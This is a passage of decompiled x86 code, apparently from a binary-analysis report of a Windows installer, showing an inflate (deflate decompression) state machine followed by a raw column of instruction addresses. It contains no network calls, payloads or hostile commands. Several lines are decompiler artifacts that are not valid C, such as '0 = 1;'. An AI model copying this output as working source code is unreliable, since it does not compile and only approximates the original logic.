                                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                          												__ebx = __ebx + 8;
                                                          												__eflags = __ebx;
                                                          											}
                                                          											L130:
                                                          											 *(0x40a420 + __eax * 2) & 0x0000ffff =  *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                          											__esi[3] = __esi[3] + ( *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                          											__ecx = __eax;
                                                          											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                          											__ebx = __ebx - __eax;
                                                          											__eflags = __ebx;
                                                          											 *__esi = 5;
                                                          											goto L131;
                                                          										case 5:
                                                          											L131:
                                                          											__eax =  *(__ebp - 0x30);
                                                          											__edx = __esi[3];
                                                          											__eax = __eax - __esi;
                                                          											__ecx = __eax - __esi - 0x1ba0;
                                                          											__eflags = __eax - __esi - 0x1ba0 - __edx;
                                                          											if(__eax - __esi - 0x1ba0 >= __edx) {
                                                          												__ecx = __eax;
                                                          												__ecx = __eax - __edx;
                                                          												__eflags = __ecx;
                                                          											} else {
                                                          												__esi[0x26e8] = __esi[0x26e8] - __edx;
                                                          												__ecx = __esi[0x26e8] - __edx - __esi;
                                                          												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
                                                          											}
                                                          											__eflags = __esi[1];
                                                          											 *(__ebp - 0x20) = __ecx;
                                                          											if(__esi[1] != 0) {
                                                          												L135:
                                                          												__edi =  *(__ebp - 0x2c);
                                                          												do {
                                                          													L136:
                                                          													__eflags = __edi;
                                                          													if(__edi != 0) {
                                                          														goto L152;
                                                          													}
                                                          													L137:
                                                          													__edi = __esi[0x26e8];
                                                          													__eflags = __eax - __edi;
                                                          													if(__eax != __edi) {
                                                          														L143:
                                                          														__esi[0x26ea] = __eax;
                                                          														__eax = E0040720A( *((intOrPtr*)(__ebp + 8)));
                                                          														__eax = __esi[0x26ea];
                                                          														__ecx = __esi[0x26e9];
                                                          														__eflags = __eax - __ecx;
                                                          														 *(__ebp - 0x30) = __eax;
                                                          														if(__eax >= __ecx) {
                                                          															__edi = __esi[0x26e8];
                                                          															__edi = __esi[0x26e8] - __eax;
                                                          															__eflags = __edi;
                                                          														} else {
                                                          															__ecx = __ecx - __eax;
                                                          															__edi = __ecx - __eax - 1;
                                                          														}
                                                          														__edx = __esi[0x26e8];
                                                          														__eflags = __eax - __edx;
                                                          														 *(__ebp - 8) = __edx;
                                                          														if(__eax == __edx) {
                                                          															__edx =  &(__esi[0x6e8]);
                                                          															__eflags = __ecx - __edx;
                                                          															if(__ecx != __edx) {
                                                          																__eax = __edx;
                                                          																__eflags = __eax - __ecx;
                                                          																 *(__ebp - 0x30) = __eax;
                                                          																if(__eax >= __ecx) {
                                                          																	__edi =  *(__ebp - 8);
                                                          																	__edi =  *(__ebp - 8) - __eax;
                                                          																	__eflags = __edi;
                                                          																} else {
                                                          																	__ecx = __ecx - __eax;
                                                          																	__edi = __ecx;
                                                          																}
                                                          															}
                                                          														}
                                                          														__eflags = __edi;
                                                          														if(__edi == 0) {
                                                          															goto L183;
                                                          														} else {
                                                          															goto L152;
                                                          														}
                                                          													}
                                                          													L138:
                                                          													__ecx = __esi[0x26e9];
                                                          													__edx =  &(__esi[0x6e8]);
                                                          													__eflags = __ecx - __edx;
                                                          													if(__ecx == __edx) {
                                                          														goto L143;
                                                          													}
                                                          													L139:
                                                          													__eax = __edx;
                                                          													__eflags = __eax - __ecx;
                                                          													if(__eax >= __ecx) {
                                                          														__edi = __edi - __eax;
                                                          														__eflags = __edi;
                                                          													} else {
                                                          														__ecx = __ecx - __eax;
                                                          														__edi = __ecx;
                                                          													}
                                                          													__eflags = __edi;
                                                          													if(__edi == 0) {
                                                          														goto L143;
                                                          													}
                                                          													L152:
                                                          													__ecx =  *(__ebp - 0x20);
                                                          													 *__eax =  *__ecx;
                                                          													__eax = __eax + 1;
                                                          													__ecx = __ecx + 1;
                                                          													__edi = __edi - 1;
                                                          													__eflags = __ecx - __esi[0x26e8];
                                                          													 *(__ebp - 0x30) = __eax;
                                                          													 *(__ebp - 0x20) = __ecx;
                                                          													 *(__ebp - 0x2c) = __edi;
                                                          													if(__ecx == __esi[0x26e8]) {
                                                          														__ecx =  &(__esi[0x6e8]);
                                                          														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
                                                          													}
                                                          													_t357 =  &(__esi[1]);
                                                          													 *_t357 = __esi[1] - 1;
                                                          													__eflags =  *_t357;
                                                          												} while ( *_t357 != 0);
                                                          											}
                                                          											goto L23;
                                                          										case 6:
                                                          											L156:
                                                          											__eax =  *(__ebp - 0x2c);
                                                          											__edi =  *(__ebp - 0x30);
                                                          											__eflags = __eax;
                                                          											if(__eax != 0) {
                                                          												L172:
                                                          												__cl = __esi[2];
                                                          												 *__edi = __cl;
                                                          												__edi = __edi + 1;
                                                          												__eax = __eax - 1;
                                                          												 *(__ebp - 0x30) = __edi;
                                                          												 *(__ebp - 0x2c) = __eax;
                                                          												goto L23;
                                                          											}
                                                          											L157:
                                                          											__ecx = __esi[0x26e8];
                                                          											__eflags = __edi - __ecx;
                                                          											if(__edi != __ecx) {
                                                          												L163:
                                                          												__esi[0x26ea] = __edi;
                                                          												__eax = E0040720A( *((intOrPtr*)(__ebp + 8)));
                                                          												__edi = __esi[0x26ea];
                                                          												__ecx = __esi[0x26e9];
                                                          												__eflags = __edi - __ecx;
                                                          												 *(__ebp - 0x30) = __edi;
                                                          												if(__edi >= __ecx) {
                                                          													__eax = __esi[0x26e8];
                                                          													__eax = __esi[0x26e8] - __edi;
                                                          													__eflags = __eax;
                                                          												} else {
                                                          													__ecx = __ecx - __edi;
                                                          													__eax = __ecx - __edi - 1;
                                                          												}
                                                          												__edx = __esi[0x26e8];
                                                          												__eflags = __edi - __edx;
                                                          												 *(__ebp - 8) = __edx;
                                                          												if(__edi == __edx) {
                                                          													__edx =  &(__esi[0x6e8]);
                                                          													__eflags = __ecx - __edx;
                                                          													if(__ecx != __edx) {
                                                          														__edi = __edx;
                                                          														__eflags = __edi - __ecx;
                                                          														 *(__ebp - 0x30) = __edi;
                                                          														if(__edi >= __ecx) {
                                                          															__eax =  *(__ebp - 8);
                                                          															__eax =  *(__ebp - 8) - __edi;
                                                          															__eflags = __eax;
                                                          														} else {
                                                          															__ecx = __ecx - __edi;
                                                          															__eax = __ecx;
                                                          														}
                                                          													}
                                                          												}
                                                          												__eflags = __eax;
                                                          												if(__eax == 0) {
                                                          													goto L183;
                                                          												} else {
                                                          													goto L172;
                                                          												}
                                                          											}
                                                          											L158:
                                                          											__eax = __esi[0x26e9];
                                                          											__edx =  &(__esi[0x6e8]);
                                                          											__eflags = __eax - __edx;
                                                          											if(__eax == __edx) {
                                                          												goto L163;
                                                          											}
                                                          											L159:
                                                          											__edi = __edx;
                                                          											__eflags = __edi - __eax;
                                                          											if(__edi >= __eax) {
                                                          												__ecx = __ecx - __edi;
                                                          												__eflags = __ecx;
                                                          												__eax = __ecx;
                                                          											} else {
                                                          												__eax = __eax - __edi;
                                                          												__eax = __eax - 1;
                                                          											}
                                                          											__eflags = __eax;
                                                          											if(__eax != 0) {
                                                          												goto L172;
                                                          											} else {
                                                          												goto L163;
                                                          											}
                                                          										case 7:
                                                          											L173:
                                                          											__eflags = __ebx - 7;
                                                          											if(__ebx > 7) {
                                                          												__ebx = __ebx - 8;
                                                          												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
                                                          												_t380 = __ebp - 0x38;
                                                          												 *_t380 =  *(__ebp - 0x38) - 1;
                                                          												__eflags =  *_t380;
                                                          											}
                                                          											goto L175;
                                                          										case 8:
                                                          											L4:
                                                          											while(_t425 < 3) {
                                                          												if( *(_t448 - 0x34) == 0) {
                                                          													goto L182;
                                                          												} else {
                                                          													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
                                                          													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
                                                          													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
                                                          													_t425 = _t425 + 8;
                                                          													continue;
                                                          												}
                                                          											}
                                                          											_t425 = _t425 - 3;
                                                          											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
                                                          											_t406 =  *(_t448 - 0x40) & 0x00000007;
                                                          											asm("sbb ecx, ecx");
                                                          											_t408 = _t406 >> 1;
                                                          											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
                                                          											if(_t408 == 0) {
                                                          												L24:
                                                          												 *_t446 = 9;
                                                          												_t436 = _t425 & 0x00000007;
                                                          												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
                                                          												_t425 = _t425 - _t436;
                                                          												goto L180;
                                                          											}
                                                          											L6:
                                                          											_t411 = _t408 - 1;
                                                          											if(_t411 == 0) {
                                                          												L13:
                                                          												__eflags =  *0x42e3d0;
                                                          												if( *0x42e3d0 != 0) {
                                                          													L22:
                                                          													_t412 =  *0x40a444; // 0x9
                                                          													_t446[4] = _t412;
                                                          													_t413 =  *0x40a448; // 0x5
                                                          													_t446[4] = _t413;
                                                          													_t414 =  *0x42d24c; // 0x0
                                                          													_t446[5] = _t414;
                                                          													_t415 =  *0x42d248; // 0x0
                                                          													_t446[6] = _t415;
                                                          													L23:
                                                          													 *_t446 =  *_t446 & 0x00000000;
                                                          													goto L180;
                                                          												} else {
                                                          													_t26 = _t448 - 8;
                                                          													 *_t26 =  *(_t448 - 8) & 0x00000000;
                                                          													__eflags =  *_t26;
                                                          													_t416 = 0x42d250;
                                                          													goto L15;
                                                          													L20:
                                                          													 *_t416 = _t438;
                                                          													_t416 = _t416 + 4;
                                                          													__eflags = _t416 - 0x42d6d0;
                                                          													if(_t416 < 0x42d6d0) {
                                                          														L15:
                                                          														__eflags = _t416 - 0x42d48c;
                                                          														_t438 = 8;
                                                          														if(_t416 > 0x42d48c) {
                                                          															__eflags = _t416 - 0x42d650;
                                                          															if(_t416 >= 0x42d650) {
                                                          																__eflags = _t416 - 0x42d6b0;
                                                          																if(_t416 < 0x42d6b0) {
                                                          																	_t438 = 7;
                                                          																}
                                                          															} else {
                                                          																_t438 = 9;
                                                          															}
                                                          														}
                                                          														goto L20;
                                                          													} else {
                                                          														E00407272(0x42d250, 0x120, 0x101, 0x40841c, 0x40845c, 0x42d24c, 0x40a444, 0x42db50, _t448 - 8);
                                                          														_push(0x1e);
                                                          														_pop(_t440);
                                                          														_push(5);
                                                          														_pop(_t419);
                                                          														memset(0x42d250, _t419, _t440 << 2);
                                                          														_t450 = _t450 + 0xc;
                                                          														_t442 = 0x42d250 + _t440;
                                                          														E00407272(0x42d250, 0x1e, 0, 0x40849c, 0x4084d8, 0x42d248, 0x40a448, 0x42db50, _t448 - 8);
                                                          														 *0x42e3d0 =  *0x42e3d0 + 1;
                                                          														__eflags =  *0x42e3d0;
                                                          														goto L22;
                                                          													}
                                                          												}
                                                          											}
                                                          											L7:
                                                          											_t423 = _t411 - 1;
                                                          											if(_t423 == 0) {
                                                          												 *_t446 = 0xb;
                                                          												goto L180;
                                                          											}
                                                          											L8:
                                                          											if(_t423 != 1) {
                                                          												goto L180;
                                                          											}
                                                          											goto L9;
                                                          										case 9:
                                                          											while(1) {
                                                          												L27:
                                                          												__eflags = __ebx - 0x20;
                                                          												if(__ebx >= 0x20) {
                                                          													break;
                                                          												}
                                                          												L25:
                                                          												__eflags =  *(__ebp - 0x34);
                                                          												if( *(__ebp - 0x34) == 0) {
                                                          													goto L182;
                                                          												}
                                                          												L26:
                                                          												__eax =  *(__ebp - 0x38);
                                                          												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                          												__ecx = __ebx;
                                                          												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                          												__ebx = __ebx + 8;
                                                          												__eflags = __ebx;
                                                          											}
                                                          											L28:
                                                          											__eax =  *(__ebp - 0x40);
                                                          											__ebx = 0;
                                                          											__eax =  *(__ebp - 0x40) & 0x0000ffff;
                                                          											 *(__ebp - 0x40) = 0;
                                                          											__eflags = __eax;
                                                          											__esi[1] = __eax;
                                                          											if(__eax == 0) {
                                                          												goto L53;
                                                          											}
                                                          											L29:
                                                          											_push(0xa);
                                                          											_pop(__eax);
                                                          											goto L54;
                                                          										case 0xa:
                                                          											L30:
                                                          											__eflags =  *(__ebp - 0x34);
                                                          											if( *(__ebp - 0x34) == 0) {
                                                          												goto L182;
                                                          											}
                                                          											L31:
                                                          											__eax =  *(__ebp - 0x2c);
                                                          											__eflags = __eax;
                                                          											if(__eax != 0) {
                                                          												L48:
                                                          												__eflags = __eax -  *(__ebp - 0x34);
                                                          												if(__eax >=  *(__ebp - 0x34)) {
                                                          													__eax =  *(__ebp - 0x34);
                                                          												}
                                                          												__ecx = __esi[1];
                                                          												__eflags = __ecx - __eax;
                                                          												__edi = __ecx;
                                                          												if(__ecx >= __eax) {
                                                          													__edi = __eax;
                                                          												}
                                                          												__eax = E00405DA1( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
                                                          												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
                                                          												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
                                                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
                                                          												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
                                                          												_t80 =  &(__esi[1]);
                                                          												 *_t80 = __esi[1] - __edi;
                                                          												__eflags =  *_t80;
                                                          												if( *_t80 == 0) {
                                                          													L53:
                                                          													__eax = __esi[0x145];
                                                          													L54:
                                                          													 *__esi = __eax;
                                                          												}
                                                          												goto L180;
                                                          											}
                                                          											L32:
                                                          											__ecx = __esi[0x26e8];
                                                          											__edx =  *(__ebp - 0x30);
                                                          											__eflags = __edx - __ecx;
                                                          											if(__edx != __ecx) {
                                                          												L38:
                                                          												__esi[0x26ea] = __edx;
                                                          												__eax = E0040720A( *((intOrPtr*)(__ebp + 8)));
                                                          												__edx = __esi[0x26ea];
                                                          												__ecx = __esi[0x26e9];
                                                          												__eflags = __edx - __ecx;
                                                          												 *(__ebp - 0x30) = __edx;
                                                          												if(__edx >= __ecx) {
                                                          													__eax = __esi[0x26e8];
                                                          													__eax = __esi[0x26e8] - __edx;
                                                          													__eflags = __eax;
                                                          												} else {
                                                          													__ecx = __ecx - __edx;
                                                          													__eax = __ecx - __edx - 1;
                                                          												}
                                                          												__edi = __esi[0x26e8];
                                                          												 *(__ebp - 0x2c) = __eax;
                                                          												__eflags = __edx - __edi;
                                                          												if(__edx == __edi) {
                                                          													__edx =  &(__esi[0x6e8]);
                                                          													__eflags = __edx - __ecx;
                                                          													if(__eflags != 0) {
                                                          														 *(__ebp - 0x30) = __edx;
                                                          														if(__eflags >= 0) {
                                                          															__edi = __edi - __edx;
                                                          															__eflags = __edi;
                                                          															__eax = __edi;
                                                          														} else {
                                                          															__ecx = __ecx - __edx;
                                                          															__eax = __ecx;
                                                          														}
                                                          														 *(__ebp - 0x2c) = __eax;
                                                          													}
                                                          												}
                                                          												__eflags = __eax;
                                                          												if(__eax == 0) {
                                                          													goto L183;
                                                          												} else {
                                                          													goto L48;
                                                          												}
                                                          											}
                                                          											L33:
                                                          											__eax = __esi[0x26e9];
                                                          											__edi =  &(__esi[0x6e8]);
                                                          											__eflags = __eax - __edi;
                                                          											if(__eax == __edi) {
                                                          												goto L38;
                                                          											}
                                                          											L34:
                                                          											__edx = __edi;
                                                          											__eflags = __edx - __eax;
                                                          											 *(__ebp - 0x30) = __edx;
                                                          											if(__edx >= __eax) {
                                                          												__ecx = __ecx - __edx;
                                                          												__eflags = __ecx;
                                                          												__eax = __ecx;
                                                          											} else {
                                                          												__eax = __eax - __edx;
                                                          												__eax = __eax - 1;
                                                          											}
                                                          											__eflags = __eax;
                                                          											 *(__ebp - 0x2c) = __eax;
                                                          											if(__eax != 0) {
                                                          												goto L48;
                                                          											} else {
                                                          												goto L38;
                                                          											}
                                                          										case 0xb:
                                                          											goto L56;
                                                          										case 0xc:
                                                          											L60:
                                                          											__esi[1] = __esi[1] >> 0xa;
                                                          											__eax = (__esi[1] >> 0xa) + 4;
                                                          											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                          												goto L68;
                                                          											}
                                                          											goto L61;
                                                          										case 0xd:
                                                          											while(1) {
                                                          												L93:
                                                          												__eax = __esi[1];
                                                          												__ecx = __esi[2];
                                                          												__edx = __eax;
                                                          												__eax = __eax & 0x0000001f;
                                                          												__edx = __edx >> 5;
                                                          												__eax = __edx + __eax + 0x102;
                                                          												__eflags = __esi[2] - __eax;
                                                          												if(__esi[2] >= __eax) {
                                                          													break;
                                                          												}
                                                          												L73:
                                                          												__eax = __esi[0x143];
                                                          												while(1) {
                                                          													L76:
                                                          													__eflags = __ebx - __eax;
                                                          													if(__ebx >= __eax) {
                                                          														break;
                                                          													}
                                                          													L74:
                                                          													__eflags =  *(__ebp - 0x34);
                                                          													if( *(__ebp - 0x34) == 0) {
                                                          														goto L182;
                                                          													}
                                                          													L75:
                                                          													__ecx =  *(__ebp - 0x38);
                                                          													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                          													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                          													__ecx = __ebx;
                                                          													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                          													__ebx = __ebx + 8;
                                                          													__eflags = __ebx;
                                                          												}
                                                          												L77:
                                                          												__eax =  *(0x40a420 + __eax * 2) & 0x0000ffff;
                                                          												__eax = __eax &  *(__ebp - 0x40);
                                                          												__ecx = __esi[0x144];
                                                          												__eax = __esi[0x144] + __eax * 4;
                                                          												__edx =  *(__eax + 1) & 0x000000ff;
                                                          												__eax =  *(__eax + 2) & 0x0000ffff;
                                                          												__eflags = __eax - 0x10;
                                                          												 *(__ebp - 0x14) = __eax;
                                                          												if(__eax >= 0x10) {
                                                          													L79:
                                                          													__eflags = __eax - 0x12;
                                                          													if(__eax != 0x12) {
                                                          														__eax = __eax + 0xfffffff2;
                                                          														 *(__ebp - 8) = 3;
                                                          													} else {
                                                          														_push(7);
                                                          														 *(__ebp - 8) = 0xb;
                                                          														_pop(__eax);
                                                          													}
                                                          													while(1) {
                                                          														L84:
                                                          														__ecx = __eax + __edx;
                                                          														__eflags = __ebx - __eax + __edx;
                                                          														if(__ebx >= __eax + __edx) {
                                                          															break;
                                                          														}
                                                          														L82:
                                                          														__eflags =  *(__ebp - 0x34);
                                                          														if( *(__ebp - 0x34) == 0) {
                                                          															goto L182;
                                                          														}
                                                          														L83:
                                                          														__ecx =  *(__ebp - 0x38);
                                                          														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                          														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                          														__ecx = __ebx;
                                                          														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                          														__ebx = __ebx + 8;
                                                          														__eflags = __ebx;
                                                          													}
                                                          													L85:
                                                          													__ecx = __edx;
                                                          													__ebx = __ebx - __edx;
                                                          													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                          													 *(0x40a420 + __eax * 2) & 0x0000ffff =  *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                          													__edx =  *(__ebp - 8);
                                                          													__ebx = __ebx - __eax;
                                                          													__edx =  *(__ebp - 8) + ( *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                          													__ecx = __eax;
                                                          													__eax = __esi[1];
                                                          													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                          													__ecx = __esi[2];
                                                          													__eax = __eax >> 5;
                                                          													__edi = __eax >> 0x00000005 & 0x0000001f;
                                                          													__eax = __eax & 0x0000001f;
                                                          													__eax = __edi + __eax + 0x102;
                                                          													__edi = __edx + __ecx;
                                                          													__eflags = __edx + __ecx - __eax;
                                                          													if(__edx + __ecx > __eax) {
                                                          														goto L9;
                                                          													}
                                                          													L86:
                                                          													__eflags =  *(__ebp - 0x14) - 0x10;
                                                          													if( *(__ebp - 0x14) != 0x10) {
                                                          														L89:
                                                          														__edi = 0;
                                                          														__eflags = 0;
                                                          														L90:
                                                          														__eax = __esi + 0xc + __ecx * 4;
                                                          														do {
                                                          															L91:
                                                          															 *__eax = __edi;
                                                          															__ecx = __ecx + 1;
                                                          															__eax = __eax + 4;
                                                          															__edx = __edx - 1;
                                                          															__eflags = __edx;
                                                          														} while (__edx != 0);
                                                          														__esi[2] = __ecx;
                                                          														continue;
                                                          													}
                                                          													L87:
                                                          													__eflags = __ecx - 1;
                                                          													if(__ecx < 1) {
                                                          														goto L9;
                                                          													}
                                                          													L88:
                                                          													__edi =  *(__esi + 8 + __ecx * 4);
                                                          													goto L90;
                                                          												}
                                                          												L78:
                                                          												__ecx = __edx;
                                                          												__ebx = __ebx - __edx;
                                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                          												__ecx = __esi[2];
                                                          												 *(__esi + 0xc + __esi[2] * 4) = __eax;
                                                          												__esi[2] = __esi[2] + 1;
                                                          											}
                                                          											L94:
                                                          											__eax = __esi[1];
                                                          											__esi[0x144] = __esi[0x144] & 0x00000000;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
                                                          											__edi = __eax;
                                                          											__eax = __eax >> 5;
                                                          											__edi = __edi & 0x0000001f;
                                                          											__ecx = 0x101;
                                                          											__eax = __eax & 0x0000001f;
                                                          											__edi = __edi + 0x101;
                                                          											__eax = __eax + 1;
                                                          											__edx = __ebp - 0xc;
                                                          											 *(__ebp - 0x14) = __eax;
                                                          											 &(__esi[0x148]) = __ebp - 4;
                                                          											 *(__ebp - 4) = 9;
                                                          											__ebp - 0x18 =  &(__esi[3]);
                                                          											 *(__ebp - 0x10) = 6;
                                                          											__eax = E00407272( &(__esi[3]), __edi, 0x101, 0x40841c, 0x40845c, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
                                                          											__eflags =  *(__ebp - 4);
                                                          											if( *(__ebp - 4) == 0) {
                                                          												__eax = __eax | 0xffffffff;
                                                          												__eflags = __eax;
                                                          											}
                                                          											__eflags = __eax;
                                                          											if(__eax != 0) {
                                                          												goto L9;
                                                          											} else {
                                                          												L97:
                                                          												__ebp - 0xc =  &(__esi[0x148]);
                                                          												__ebp - 0x10 = __ebp - 0x1c;
                                                          												__eax = __esi + 0xc + __edi * 4;
                                                          												__eax = E00407272(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x40849c, 0x4084d8, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
                                                          												__eflags = __eax;
                                                          												if(__eax != 0) {
                                                          													goto L9;
                                                          												}
                                                          												L98:
                                                          												__eax =  *(__ebp - 0x10);
                                                          												__eflags =  *(__ebp - 0x10);
                                                          												if( *(__ebp - 0x10) != 0) {
                                                          													L100:
                                                          													__cl =  *(__ebp - 4);
                                                          													 *__esi =  *__esi & 0x00000000;
                                                          													__eflags =  *__esi;
                                                          													__esi[4] = __al;
                                                          													__eax =  *(__ebp - 0x18);
                                                          													__esi[5] =  *(__ebp - 0x18);
                                                          													__eax =  *(__ebp - 0x1c);
                                                          													__esi[4] = __cl;
                                                          													__esi[6] =  *(__ebp - 0x1c);
                                                          													goto L101;
                                                          												}
                                                          												L99:
                                                          												__eflags = __edi - 0x101;
                                                          												if(__edi > 0x101) {
                                                          													goto L9;
                                                          												}
                                                          												goto L100;
                                                          											}
                                                          										case 0xe:
                                                          											goto L9;
                                                          										case 0xf:
                                                          											L175:
                                                          											__eax =  *(__ebp - 0x30);
                                                          											__esi[0x26ea] =  *(__ebp - 0x30);
                                                          											__eax = E0040720A( *((intOrPtr*)(__ebp + 8)));
                                                          											__ecx = __esi[0x26ea];
                                                          											__edx = __esi[0x26e9];
                                                          											__eflags = __ecx - __edx;
                                                          											 *(__ebp - 0x30) = __ecx;
                                                          											if(__ecx >= __edx) {
                                                          												__eax = __esi[0x26e8];
                                                          												__eax = __esi[0x26e8] - __ecx;
                                                          												__eflags = __eax;
                                                          											} else {
                                                          												__edx = __edx - __ecx;
                                                          												__eax = __edx - __ecx - 1;
                                                          											}
                                                          											__eflags = __ecx - __edx;
                                                          											 *(__ebp - 0x2c) = __eax;
                                                          											if(__ecx != __edx) {
                                                          												L183:
                                                          												__edi = 0;
                                                          												goto L10;
                                                          											} else {
                                                          												L179:
                                                          												__eax = __esi[0x145];
                                                          												__eflags = __eax - 8;
                                                          												 *__esi = __eax;
                                                          												if(__eax != 8) {
                                                          													L184:
                                                          													0 = 1;
                                                          													goto L10;
                                                          												}
                                                          												goto L180;
                                                          											}
                                                          									}
                                                          								}
                                                          								L181:
                                                          								goto L9;
                                                          							}
                                                          							L70:
                                                          							if( *__edi == __eax) {
                                                          								goto L72;
                                                          							}
                                                          							L71:
                                                          							__esi[2] = __esi[2] & __eax;
                                                          							 *__esi = 0xd;
                                                          							goto L93;
                                                          						}
                                                          					}
                                                          				}
                                                          				L182:
                                                          				_t443 = 0;
                                                          				_t446[0x147] =  *(_t448 - 0x40);
                                                          				_t446[0x146] = _t425;
                                                          				( *(_t448 + 8))[1] = 0;
                                                          				goto L11;
                                                          			}









                                                          0x00406a9b
                                                          0x00406a9b
                                                          0x00406a9b
                                                          0x00406a9b
                                                          0x00406a9b
                                                          0x00406a9f
                                                          0x00000000
                                                          0x00000000
                                                          0x00406aa5
                                                          0x00406aa5
                                                          0x00406aa8
                                                          0x00406aab
                                                          0x00406ab0
                                                          0x00406ab2
                                                          0x00406ab5
                                                          0x00406ab8
                                                          0x00406abb
                                                          0x00406abb
                                                          0x00406abe
                                                          0x00000000
                                                          0x00000000
                                                          0x00406ac0
                                                          0x00406ac0
                                                          0x00406ac3
                                                          0x00406ac8
                                                          0x00406aca
                                                          0x00406acd
                                                          0x00406ad3
                                                          0x00406832
                                                          0x00406832
                                                          0x00406835
                                                          0x0040683b
                                                          0x00406841
                                                          0x0040684a
                                                          0x00406850
                                                          0x00406853
                                                          0x0040685a
                                                          0x0040685f
                                                          0x00406865
                                                          0x00406870
                                                          0x00406870
                                                          0x00406ad9
                                                          0x00406ad9
                                                          0x00406ae3
                                                          0x00000000
                                                          0x00000000
                                                          0x00406ae9
                                                          0x00406ae9
                                                          0x00406aed
                                                          0x00406af0
                                                          0x00406af0
                                                          0x00406af4
                                                          0x00406afa
                                                          0x00406afa
                                                          0x00406afd
                                                          0x00406b00
                                                          0x00406b06
                                                          0x00000000
                                                          0x00000000
                                                          0x00406b08
                                                          0x00406b2a
                                                          0x00406b2a
                                                          0x00406b2d
                                                          0x00000000
                                                          0x00000000
                                                          0x00406b0a
                                                          0x00406b0e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406b14
                                                          0x00406b14
                                                          0x00406b17
                                                          0x00406b1a
                                                          0x00406b1f
                                                          0x00406b21
                                                          0x00406b24
                                                          0x00406b27
                                                          0x00406b27
                                                          0x00406b2f
                                                          0x00406b2f
                                                          0x00406b35
                                                          0x00406b38
                                                          0x00406b3b
                                                          0x00406b3b
                                                          0x00406b42
                                                          0x00406b46
                                                          0x00406b4a
                                                          0x00406b4d
                                                          0x00406b50
                                                          0x00406b56
                                                          0x00406b5b
                                                          0x00000000
                                                          0x00000000
                                                          0x00406b5d
                                                          0x00406b71
                                                          0x00406b71
                                                          0x00406b75
                                                          0x00000000
                                                          0x00000000
                                                          0x00406b5f
                                                          0x00406b62
                                                          0x00406b62
                                                          0x00406b69
                                                          0x00406b6e
                                                          0x00406b6e
                                                          0x00406b6e
                                                          0x00406b77
                                                          0x00406b77
                                                          0x00406b7a
                                                          0x00406b88
                                                          0x00406b8e
                                                          0x00406b93
                                                          0x00406b99
                                                          0x00406b9f
                                                          0x00406ba5
                                                          0x00406bac
                                                          0x00406bc0
                                                          0x00406bc0
                                                          0x0040718f
                                                          0x0040718f
                                                          0x0040718f
                                                          0x00407194
                                                          0x00000000
                                                          0x00000000
                                                          0x004067cc
                                                          0x004067cc
                                                          0x00000000
                                                          0x00406dc7
                                                          0x00406dc7
                                                          0x00406dcb
                                                          0x00406dce
                                                          0x00406dd1
                                                          0x00406dd4
                                                          0x00000000
                                                          0x00000000
                                                          0x00406dda
                                                          0x00406dda
                                                          0x00406dff
                                                          0x00406dff
                                                          0x00406dff
                                                          0x00406e01
                                                          0x00000000
                                                          0x00000000
                                                          0x00406ddf
                                                          0x00406ddf
                                                          0x00406de3
                                                          0x00000000
                                                          0x00000000
                                                          0x00406de9
                                                          0x00406de9
                                                          0x00406dec
                                                          0x00406def
                                                          0x00406df2
                                                          0x00406df4
                                                          0x00406df6
                                                          0x00406df9
                                                          0x00406dfc
                                                          0x00406dfc
                                                          0x00406dfc
                                                          0x00406e03
                                                          0x00406e03
                                                          0x00406e0b
